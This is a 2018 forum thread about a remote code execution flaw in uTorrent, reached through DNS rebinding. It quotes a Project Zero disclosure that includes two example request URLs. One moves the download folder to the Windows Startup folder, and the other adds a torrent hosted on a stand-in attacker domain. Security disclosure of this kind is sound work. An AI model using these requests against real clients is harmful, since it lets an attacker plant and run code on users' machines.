Hackers controlling your µTorrent application???

Followers

February 22, 20188 yr

Great. Yet another exploit to worry over.

Running µTorrent and visiting rogue websites. (Who visits rogue websites while running µTorrent app??)

BitTorrent client exploits could let rogue websites control your PC

Engadet | by Jon Fingas

BitTorrent's peer-to-peer app and its lightweight uTorrent counterpart are susceptible to particularly nasty hijacking flaws.

BitTorrent Client uTorrent Suffers Security Vulnerability (Updated)

TorrentFreak | by ERNESTO | FEBRUARY 20, 2018

More details about the vulnerability (and a demo) have been published by Ormandy after we finished this article. It is indeed a DNS rebinding issue that potentially allows outsiders to remotely execute code through uTorrent’s remote control feature.

February 22, 20188 yr

Author

utorrent: various JSON-RPC issues resulting in remote code execution, information disclosure, etc.

project-zero

Some details

Quote

To be clear, visiting *any* website is enough to compromise these applications.

...

This requires some simple dns rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable. For example:

# change the download directory to the Startup folder.
http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup

# download a torrent containing calc.exe
http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

I wrote a working exploit for this attack, available here:

February 22, 20188 yr

Cripes, I'm still at 3.4.1, maybe time to roll back to 2.2.1

All I want to do is upload/download, no playback, streaming etc.

Something else to eat up my weekend time....

February 22, 20188 yr

UT is a pos, better to find another client dev.

Create an account or sign in to comment

Followers

Go to topic listing

No registered users viewing this page.

US puts 10 million bounty on Iran leaders
What the Papers are Saying

US puts 10 million bounty on Iran leaders

3NUMBAS · 8 hours ago8 hr

WASHINGTON, DC: The US State Department’s Rewards for Justice program announced a massive bounty on Friday, March 13, offering up to $10 million for information leading to the identification or location of Iran’s new Supreme Leader, Mojtaba Khamenei, and other top regime figures. The reward specifically targeted ten "key leaders" of the Revolutionary Guard Corps (IRGC), a group the US maintains plans and instils fear globally. https://news.meaww.com/us-puts-10-m-bounty-on-iranian-leaders-after-
- 7 replies
- 104 views
3NUMBAS

8 hours ago8 hr

Evil Penevil

4 minutes ago4 min

Kharg Island Next
Political Soapbox

Kharg Island Next

Yagoda · 3 hours ago3 hr

With Iran essentially defenseless and disarmed, I predict we will take Kharg Island within a week.
- 2 replies
- 74 views
Yagoda

3 hours ago3 hr

metisdead

5 minutes ago5 min

Trumps Greatest Troll Ever
Political Soapbox

Trumps Greatest Troll Ever

Yagoda · 16 minutes ago16 min

Trump on Truth Social just invited the Chinese to keep help Hormuz open bwwaaaaaaaaaaaaaaaahahahahahaha First they watch us destroy their satrap while they say nothing, now Trump tells them to come protect their oil that we now control. Burn. We dont deserve him.
- 0 replies
- 39 views
Yagoda

16 minutes ago16 min

Yagoda

16 minutes ago16 min

How to win a war? The recipe.
Political Soapbox

How to win a war? The recipe.

swissie · 19 hours ago19 hr

How to win a war. - During WW2 allied forces realised that the Nazi-regime could not be eliminated by massive bombardment alone. - Vietnam war: The most massive Air-Strikes in history. 500.000 US troops on the gound, but the South Vietnamese "boots on the ground" were never really sure why they should shoot at their northern countrymen. And today? Once more, aireal supremacy should "win a war". A highly flawed and expensive project that has not worked in the past. To "take out" the true rule
- 67 replies
- 598 views
swissie

19 hours ago19 hr

Yagoda

21 minutes ago21 min

Massive Epidemic of Vaccine Injury
Massive Epidemic of Vaccine Injury

Airalee replied to Red Phoenix's topic in Covid & Other Vaccine Studies

Yeah…I have no real animosity towards the category one people although I do think they should be avoided in general. Category two people….the ones who keep gearing boosted….they’re hilarious. Category three people….those who continue to double down, but no longer follow the cdc/fda guidelines regarding boosters, and are suspiciously silent about why they no longer “follow the science”….well…all I can say for them is that I hope they outlive their jabbed children.
- 1 minute ago1 min
- 63 replies
Bicycle Day Trips in Sakeo province, 40 Pics
Bicycle Day Trips in Sakeo province, 40 Pics

henrik2000 posted a topic in Cycling in Thailand

Out of Khao Chakan, 15 kms south of Sakeo town, in December 2026, when border areas were off-limits.
- 3 minutes ago3 min
- 0 replies
US puts 10 million bounty on Iran leaders
US puts 10 million bounty on Iran leaders

Evil Penevil replied to 3NUMBAS's topic in What the Papers are Saying

To add to my previous post- It has be psychologically upsetting to know there's a $10 million bounty on your life. The targets also have to be fearful for the lives of their families. I imagine the leaders so "honored" will spend more time hiding than doing their jobs. This could interfere with the Iranian war effort, even if no one tries to claim the bounty.
- 6 minutes ago6 min
- 7 replies
Kharg Island Next
Kharg Island Next

metisdead replied to Yagoda's topic in Political Soapbox

Removed a post that claimed another member was an Iranian bot. If you have any actual evidence please forward it to support. If it's just a lame debating tactic, further references like that may find you without posting rights.
- 7 minutes ago7 min
- 2 replies

The Art of Becoming Irrelevant
ASEAN NOW Community Pub

The Art of Becoming Irrelevant

123Stodg · 40 minutes ago40 min

I am not going to address anyone directly because I do not want anyone to feel like a jilted lily, but I have noticed something interesting about my own forum reading habits. For one, I read far more than I post. Often I do not even log in to scan through a few topics, and if someone averages about a dozen posts a day, I tend to skip right over anything they write. It did not start that way. At first I just noticed certain posters who write extremely long posts waffling on about their personal
- 0 replies
- 57 views
123Stodg

40 minutes ago40 min

123Stodg

40 minutes ago40 min

Religion is no joking matter!
ASEAN NOW Community Pub

Religion is no joking matter!

unblocktheplanet · 6 hours ago6 hr

Don’t make fun of anybody’s religion… they might be right! The Nation of Islam worldview was dominated by an apocalyptic and prophetic vision which held that the African American, the "original" or "Asiatic" black man, fell into a state of social domination that began with slavery.'1 This situation was a direct result of the machinations of an evil black scientist, Yakub, who grafted white people, also known as "devils," from original black people a little more than 6,000 years ago. There had
- 25 replies
- 340 views
unblocktheplanet

6 hours ago6 hr

unblocktheplanet

24 minutes ago24 min

McDonald’s Beef Patties in Thailand, Any Good?
ASEAN NOW Community Pub

McDonald’s Beef Patties in Thailand, Any Good?

Kyoto Kyle · 17 hours ago17 hr

I’m wondering if McDonald’s beef patties in Thailand are actually any good in terms of meat quality. I can’t remember the last time I had one here. Maybe once or twice many years ago. The reason I’m asking is because I just realized there’s a 24 hour McDonald’s within walking distance of where I’m staying now. If the patties actually taste decent, I was thinking that late one night I might buy two double cheeseburgers, or maybe two Quarter Pounders with cheese, take them home, stack all four pa
- 30 replies
- 881 views
Kyoto Kyle

17 hours ago17 hr

liddelljohn

2 hours ago2 hr

Hackers controlling your µTorrent application???

Featured Replies

Create an account or sign in to comment

Recently Browsing 0

Topics

What's the go with Thappraya Rd land development

Car park at Royal Garden Plaza

Topics

US puts 10 million bounty on Iran leaders

Kharg Island Next

Trumps Greatest Troll Ever

How to win a war? The recipe.

Popular Contributors

Latest posts...

Massive Epidemic of Vaccine Injury

Bicycle Day Trips in Sakeo province, 40 Pics

US puts 10 million bounty on Iran leaders

Kharg Island Next

Popular in The Pub

The Art of Becoming Irrelevant

Religion is no joking matter!

McDonald’s Beef Patties in Thailand, Any Good?

ASEAN NOW

MORE INFO

POPULAR AREAS

CONTACT US

Account

Navigation

Search

Configure browser push notifications

Chrome (Android)

Chrome (Desktop)

Safari (iOS 16.4+)

Safari (macOS)

Edge (Android)

Edge (Desktop)

Firefox (Android)

Firefox (Desktop)